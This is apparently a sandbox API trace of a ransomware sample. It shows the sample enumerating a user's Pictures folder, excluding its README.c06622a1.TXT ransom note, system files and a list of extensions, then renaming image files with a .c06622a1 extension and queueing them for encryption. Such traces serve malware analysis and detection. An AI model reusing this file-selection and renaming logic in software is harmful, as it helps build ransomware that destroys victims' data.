[0167.426] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0167.432] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7b039612 [0167.432] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x49fad000 [0167.432] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2d7da43b [0167.432] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2ef5391b [0167.432] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x677821d2 [0167.432] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xa65f5d4 [0167.432] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x22c78459 [0167.433] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x597bc4f7 [0167.436] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x8108c709 [0167.436] RtlComputeCrc32 (PartialCrc=0xc709, Buffer=0x710094, Length=0x80) returned 0xe9998cc5 [0167.436] RtlComputeCrc32 (PartialCrc=0x8cc5, Buffer=0x710094, Length=0x80) returned 0xe24540a4 [0167.436] RtlComputeCrc32 (PartialCrc=0x40a4, Buffer=0x710094, Length=0x80) returned 0xc3ab1cb1 [0167.436] RtlComputeCrc32 (PartialCrc=0x1cb1, Buffer=0x710094, Length=0x80) returned 0x6ba75358 [0167.436] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0167.436] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480048) returned 1 [0167.436] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32e20b0) returned 1 [0167.436] FindNextFileW (in: hFindFile=0x154248, lpFindFileData=0x32e39c | out: lpFindFileData=0x32e39c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0167.436] FindClose (in: hFindFile=0x154248 | out: hFindFile=0x154248) returned 1 [0167.439] _wcsicmp (_Str1="backup", _Str2="uAJ_dGqh_G") returned -19 [0167.439] wcslen (_String="backup") returned 0x6 [0167.439] _wcsicmp (_Str1="bak", _Str2="uAJ_dGqh_G") returned -19 [0167.439] wcslen (_String="bak") returned 0x3 [0167.439] _wcsicmp (_Str1="back", _Str2="uAJ_dGqh_G") returned -19 [0167.439] wcslen (_String="back") returned 0x4 [0167.439] _wcsicmp (_Str1="archive", _Str2="uAJ_dGqh_G") returned -20 [0167.439] wcslen (_String="archive") returned 0x7 [0167.439] _wcsicmp (_Str1="bckp", _Str2="uAJ_dGqh_G") returned -19 [0167.439] wcslen (_String="bckp") returned 0x4 [0167.439] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0167.439] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32c20a0) returned 1 [0167.440] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0167.440] FindClose (in: hFindFile=0x154208 | out: hFindFile=0x154208) returned 1 [0167.441] _wcsicmp (_Str1="backup", _Str2="CD22") returned -1 [0167.441] wcslen (_String="backup") returned 0x6 [0167.441] _wcsicmp (_Str1="bak", _Str2="CD22") returned -1 [0167.441] wcslen (_String="bak") returned 0x3 [0167.441] _wcsicmp (_Str1="back", _Str2="CD22") returned -1 [0167.441] wcslen (_String="back") returned 0x4 [0167.441] _wcsicmp (_Str1="archive", _Str2="CD22") returned -2 [0167.441] wcslen (_String="archive") returned 0x7 [0167.441] _wcsicmp (_Str1="bckp", _Str2="CD22") returned -1 [0167.441] wcslen (_String="bckp") returned 0x4 [0167.441] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0167.444] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3292088) returned 1 [0167.448] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab0b4000, ftCreationTime.dwHighDateTime=0x1d5e560, ftLastAccessTime.dwLowDateTime=0x17457340, ftLastAccessTime.dwHighDateTime=0x1d5dade, ftLastWriteTime.dwLowDateTime=0x17457340, ftLastWriteTime.dwHighDateTime=0x1d5dade, nFileSizeHigh=0x0, nFileSizeLow=0x176e, dwReserved0=0x0, dwReserved1=0x0, cFileName="I3KHqzFc5.bmp", cAlternateFileName="I3KHQZ~1.BMP")) returned 1 [0167.448] _wcsicmp (_Str1="I3KHqzFc5.bmp", _Str2="README.c06622a1.TXT") returned -9 [0167.448] wcsstr (_Str="I3KHqzFc5.bmp", _SubStr="README") returned 0x0 [0167.448] _wcsicmp (_Str1="autorun.inf", _Str2="I3KHqzFc5.bmp") returned -8 [0167.448] wcslen (_String="autorun.inf") returned 0xb [0167.448] _wcsicmp (_Str1="boot.ini", _Str2="I3KHqzFc5.bmp") returned -7 [0167.448] wcslen (_String="boot.ini") returned 0x8 [0167.448] _wcsicmp (_Str1="bootfont.bin", _Str2="I3KHqzFc5.bmp") returned -7 [0167.448] wcslen (_String="bootfont.bin") returned 0xc [0167.448] _wcsicmp (_Str1="bootsect.bak", _Str2="I3KHqzFc5.bmp") returned -7 [0167.449] wcslen (_String="bootsect.bak") returned 0xc [0167.449] _wcsicmp (_Str1="desktop.ini", _Str2="I3KHqzFc5.bmp") returned -5 [0167.449] wcslen (_String="desktop.ini") returned 0xb [0167.449] _wcsicmp (_Str1="iconcache.db", _Str2="I3KHqzFc5.bmp") returned 48 [0167.449] wcslen (_String="iconcache.db") returned 0xc [0167.449] _wcsicmp (_Str1="ntldr", _Str2="I3KHqzFc5.bmp") returned 5 [0167.449] wcslen (_String="ntldr") returned 0x5 [0167.449] _wcsicmp (_Str1="ntuser.dat", _Str2="I3KHqzFc5.bmp") returned 5 [0167.449] wcslen (_String="ntuser.dat") returned 0xa [0167.449] _wcsicmp (_Str1="ntuser.dat.log", _Str2="I3KHqzFc5.bmp") returned 5 [0167.449] wcslen (_String="ntuser.dat.log") returned 0xe [0167.449] _wcsicmp (_Str1="ntuser.ini", _Str2="I3KHqzFc5.bmp") returned 5 [0167.449] wcslen (_String="ntuser.ini") returned 0xa [0167.449] _wcsicmp (_Str1="thumbs.db", _Str2="I3KHqzFc5.bmp") returned 11 [0167.449] wcslen (_String="thumbs.db") returned 0x9 [0167.449] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0167.449] wcslen (_String="386") returned 0x3 [0167.449] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0167.449] wcslen (_String="adv") returned 0x3 [0167.449] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0167.449] wcslen (_String="ani") returned 0x3 [0167.449] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0167.449] wcslen (_String="bat") returned 0x3 [0167.449] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0167.449] wcslen (_String="bin") returned 0x3 [0167.449] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0167.450] wcslen (_String="cab") returned 0x3 [0167.450] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0167.450] wcslen (_String="cmd") returned 0x3 [0167.450] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0167.450] wcslen (_String="com") returned 0x3 [0167.450] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0167.450] wcslen (_String="cpl") returned 0x3 [0167.450] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0167.450] wcslen (_String="cur") returned 0x3 [0167.450] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0167.450] wcslen (_String="deskthemepack") returned 0xd [0167.450] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0167.450] wcslen (_String="diagcab") returned 0x7 [0167.450] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0167.450] wcslen (_String="diagcfg") returned 0x7 [0167.450] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0167.450] wcslen (_String="diagpkg") returned 0x7 [0167.450] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0167.450] wcslen (_String="dll") returned 0x3 [0167.450] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0167.450] wcslen (_String="drv") returned 0x3 [0167.450] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0167.450] wcslen (_String="exe") returned 0x3 [0167.450] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0167.450] wcslen (_String="hlp") returned 0x3 [0167.450] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0167.450] wcslen (_String="icl") returned 0x3 [0167.450] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0167.451] wcslen (_String="icns") returned 0x4 [0167.451] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0167.451] wcslen (_String="ico") returned 0x3 [0167.451] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0167.451] wcslen (_String="ics") returned 0x3 [0167.451] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0167.451] wcslen (_String="idx") returned 0x3 [0167.451] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0167.451] wcslen (_String="ldf") returned 0x3 [0167.451] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0167.451] wcslen (_String="lnk") returned 0x3 [0167.451] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0167.451] wcslen (_String="mod") returned 0x3 [0167.451] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0167.451] wcslen (_String="mpa") returned 0x3 [0167.451] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0167.451] wcslen (_String="msc") returned 0x3 [0167.451] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0167.451] wcslen (_String="msp") returned 0x3 [0167.451] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0167.451] wcslen (_String="msstyles") returned 0x8 [0167.451] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0167.451] wcslen (_String="msu") returned 0x3 [0167.451] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0167.451] wcslen (_String="nls") returned 0x3 [0167.451] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0167.451] wcslen (_String="nomedia") returned 0x7 [0167.451] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0167.452] wcslen (_String="ocx") returned 0x3 [0167.452] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0167.452] wcslen (_String="prf") returned 0x3 [0167.452] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0167.452] wcslen (_String="ps1") returned 0x3 [0167.452] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0167.452] wcslen (_String="rom") returned 0x3 [0167.452] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0167.452] wcslen (_String="rtp") returned 0x3 [0167.452] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0167.452] wcslen (_String="scr") returned 0x3 [0167.452] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0167.452] wcslen (_String="shs") returned 0x3 [0167.452] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0167.452] wcslen (_String="spl") returned 0x3 [0167.452] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0167.452] wcslen (_String="sys") returned 0x3 [0167.452] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0167.452] wcslen (_String="theme") returned 0x5 [0167.452] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0167.452] wcslen (_String="themepack") returned 0x9 [0167.452] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0167.452] wcslen (_String="wpx") returned 0x3 [0167.452] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0167.452] wcslen (_String="lock") returned 0x4 [0167.452] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0167.452] wcslen (_String="key") returned 0x3 [0167.452] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0167.453] wcslen (_String="hta") returned 0x3 [0167.453] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0167.453] wcslen (_String="msi") returned 0x3 [0167.453] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0167.453] wcslen (_String="pdb") returned 0x3 [0167.453] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0167.453] wcslen (_String="sqlite") returned 0x6 [0167.453] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo")) returned 0x10 [0167.453] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3480048 [0167.454] wcscpy (in: _Dest=0x3480048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" [0167.454] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo") returned 0x48 [0167.454] wcscpy (in: _Dest=0x34800da, _Source="I3KHqzFc5.bmp" | out: _Dest="I3KHqzFc5.bmp") returned="I3KHqzFc5.bmp" [0167.454] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\I3KHqzFc5.bmp", dwFileAttributes=0x80) returned 1 [0167.454] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\I3KHqzFc5.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\i3khqzfc5.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d0 [0167.454] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.454] ReadFile (in: hFile=0x1d0, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0167.455] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0x5e238f7c [0167.455] RtlComputeCrc32 (PartialCrc=0x8f7c, Buffer=0x32e724, Length=0x80) returned 0xc42a2c58 [0167.455] RtlComputeCrc32 (PartialCrc=0x2c58, Buffer=0x32e724, Length=0x80) returned 0x930b9ce3 [0167.455] RtlComputeCrc32 (PartialCrc=0x9ce3, Buffer=0x32e724, Length=0x80) returned 0x57b5af41 [0167.456] RtlComputeCrc32 (PartialCrc=0xaf41, Buffer=0x32e724, Length=0x80) returned 0xa464cef1 [0167.456] CloseHandle (hObject=0x1d0) returned 1 [0167.456] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0167.456] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\I3KHqzFc5.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\I3KHqzFc5.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\I3KHqzFc5.bmp" [0167.456] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\I3KHqzFc5.bmp") returned 0x56 [0167.456] wcscpy (in: _Dest=0x328212c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.456] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\I3KHqzFc5.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\i3khqzfc5.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\I3KHqzFc5.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\i3khqzfc5.bmp.c06622a1"), dwFlags=0x8) returned 1 [0167.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\I3KHqzFc5.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\i3khqzfc5.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d0 [0167.460] CreateIoCompletionPort (FileHandle=0x1d0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0167.460] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0167.469] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6e98ce22 [0167.469] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x12ce5a6b [0167.469] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2af9875c [0167.469] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x44d4b6da [0167.469] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x14ad045b [0167.469] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7439414e [0167.469] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4c33841d [0167.469] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x63947b86 [0167.472] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0x9cf14b71 [0167.473] RtlComputeCrc32 (PartialCrc=0x4b71, Buffer=0x2690094, Length=0x80) returned 0x9a4435f7 [0167.473] RtlComputeCrc32 (PartialCrc=0x35f7, Buffer=0x2690094, Length=0x80) returned 0xa08d20f5 [0167.473] RtlComputeCrc32 (PartialCrc=0x20f5, Buffer=0x2690094, Length=0x80) returned 0x49793abf [0167.473] RtlComputeCrc32 (PartialCrc=0x3abf, Buffer=0x2690094, Length=0x80) returned 0x218f3a6f [0167.473] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0167.473] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480048) returned 1 [0167.473] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0167.473] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4a1a370, ftCreationTime.dwHighDateTime=0x1d5dd00, ftLastAccessTime.dwLowDateTime=0xc4f1e1d0, ftLastAccessTime.dwHighDateTime=0x1d5e548, ftLastWriteTime.dwLowDateTime=0xc4f1e1d0, ftLastWriteTime.dwHighDateTime=0x1d5e548, nFileSizeHigh=0x0, nFileSizeLow=0x9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Lxd4xieb.jpg", cAlternateFileName="")) returned 1 [0167.473] _wcsicmp (_Str1="Lxd4xieb.jpg", _Str2="README.c06622a1.TXT") returned -6 [0167.473] wcsstr (_Str="Lxd4xieb.jpg", _SubStr="README") returned 0x0 [0167.474] _wcsicmp (_Str1="autorun.inf", _Str2="Lxd4xieb.jpg") returned -11 [0167.474] wcslen (_String="autorun.inf") returned 0xb [0167.474] _wcsicmp (_Str1="boot.ini", _Str2="Lxd4xieb.jpg") returned -10 [0167.474] wcslen (_String="boot.ini") returned 0x8 [0167.474] _wcsicmp (_Str1="bootfont.bin", _Str2="Lxd4xieb.jpg") returned -10 [0167.474] wcslen (_String="bootfont.bin") returned 0xc [0167.474] _wcsicmp (_Str1="bootsect.bak", _Str2="Lxd4xieb.jpg") returned -10 [0167.474] wcslen (_String="bootsect.bak") returned 0xc [0167.474] _wcsicmp (_Str1="desktop.ini", _Str2="Lxd4xieb.jpg") returned -8 [0167.474] wcslen (_String="desktop.ini") returned 0xb [0167.474] _wcsicmp (_Str1="iconcache.db", _Str2="Lxd4xieb.jpg") returned -3 [0167.474] wcslen (_String="iconcache.db") returned 0xc [0167.474] _wcsicmp (_Str1="ntldr", _Str2="Lxd4xieb.jpg") returned 2 [0167.474] wcslen (_String="ntldr") returned 0x5 [0167.474] _wcsicmp (_Str1="ntuser.dat", _Str2="Lxd4xieb.jpg") returned 2 [0167.474] wcslen (_String="ntuser.dat") returned 0xa [0167.474] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Lxd4xieb.jpg") returned 2 [0167.474] wcslen (_String="ntuser.dat.log") returned 0xe [0167.474] _wcsicmp (_Str1="ntuser.ini", _Str2="Lxd4xieb.jpg") returned 2 [0167.474] wcslen (_String="ntuser.ini") returned 0xa [0167.474] _wcsicmp (_Str1="thumbs.db", _Str2="Lxd4xieb.jpg") returned 8 [0167.474] wcslen (_String="thumbs.db") returned 0x9 [0167.475] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0167.475] wcslen (_String="386") returned 0x3 [0167.475] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0167.475] wcslen (_String="adv") returned 0x3 [0167.475] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0167.475] wcslen (_String="ani") returned 0x3 [0167.475] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0167.475] wcslen (_String="bat") returned 0x3 [0167.475] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0167.475] wcslen (_String="bin") returned 0x3 [0167.475] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0167.475] wcslen (_String="cab") returned 0x3 [0167.475] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0167.475] wcslen (_String="cmd") returned 0x3 [0167.475] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0167.475] wcslen (_String="com") returned 0x3 [0167.475] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0167.475] wcslen (_String="cpl") returned 0x3 [0167.475] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0167.475] wcslen (_String="cur") returned 0x3 [0167.475] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0167.475] wcslen (_String="deskthemepack") returned 0xd [0167.475] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0167.475] wcslen (_String="diagcab") returned 0x7 [0167.475] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0167.476] wcslen (_String="diagcfg") returned 0x7 [0167.476] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0167.476] wcslen (_String="diagpkg") returned 0x7 [0167.476] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0167.476] wcslen (_String="dll") returned 0x3 [0167.476] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0167.476] wcslen (_String="drv") returned 0x3 [0167.476] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0167.476] wcslen (_String="exe") returned 0x3 [0167.476] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0167.476] wcslen (_String="hlp") returned 0x3 [0167.476] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0167.476] wcslen (_String="icl") returned 0x3 [0167.476] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0167.476] wcslen (_String="icns") returned 0x4 [0167.476] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0167.476] wcslen (_String="ico") returned 0x3 [0167.476] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0167.476] wcslen (_String="ics") returned 0x3 [0167.476] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0167.476] wcslen (_String="idx") returned 0x3 [0167.476] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0167.476] wcslen (_String="ldf") returned 0x3 [0167.476] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0167.476] wcslen (_String="lnk") returned 0x3 [0167.476] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0167.476] wcslen (_String="mod") returned 0x3 [0167.476] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0167.476] wcslen (_String="mpa") returned 0x3 [0167.476] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0167.477] wcslen (_String="msc") returned 0x3 [0167.477] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0167.477] wcslen (_String="msp") returned 0x3 [0167.477] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0167.477] wcslen (_String="msstyles") returned 0x8 [0167.477] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0167.477] wcslen (_String="msu") returned 0x3 [0167.477] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0167.477] wcslen (_String="nls") returned 0x3 [0167.477] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0167.477] wcslen (_String="nomedia") returned 0x7 [0167.477] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0167.477] wcslen (_String="ocx") returned 0x3 [0167.477] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0167.477] wcslen (_String="prf") returned 0x3 [0167.477] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0167.477] wcslen (_String="ps1") returned 0x3 [0167.477] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0167.477] wcslen (_String="rom") returned 0x3 [0167.477] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0167.477] wcslen (_String="rtp") returned 0x3 [0167.477] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0167.477] wcslen (_String="scr") returned 0x3 [0167.477] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0167.477] wcslen (_String="shs") returned 0x3 [0167.477] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0167.477] wcslen (_String="spl") returned 0x3 [0167.477] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0167.477] wcslen (_String="sys") returned 0x3 [0167.477] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0167.477] wcslen (_String="theme") returned 0x5 [0167.477] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0167.477] wcslen (_String="themepack") returned 0x9 [0167.477] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0167.477] wcslen (_String="wpx") returned 0x3 [0167.478] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0167.478] wcslen (_String="lock") returned 0x4 [0167.478] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0167.478] wcslen (_String="key") returned 0x3 [0167.478] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0167.478] wcslen (_String="hta") returned 0x3 [0167.478] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0167.478] wcslen (_String="msi") returned 0x3 [0167.478] 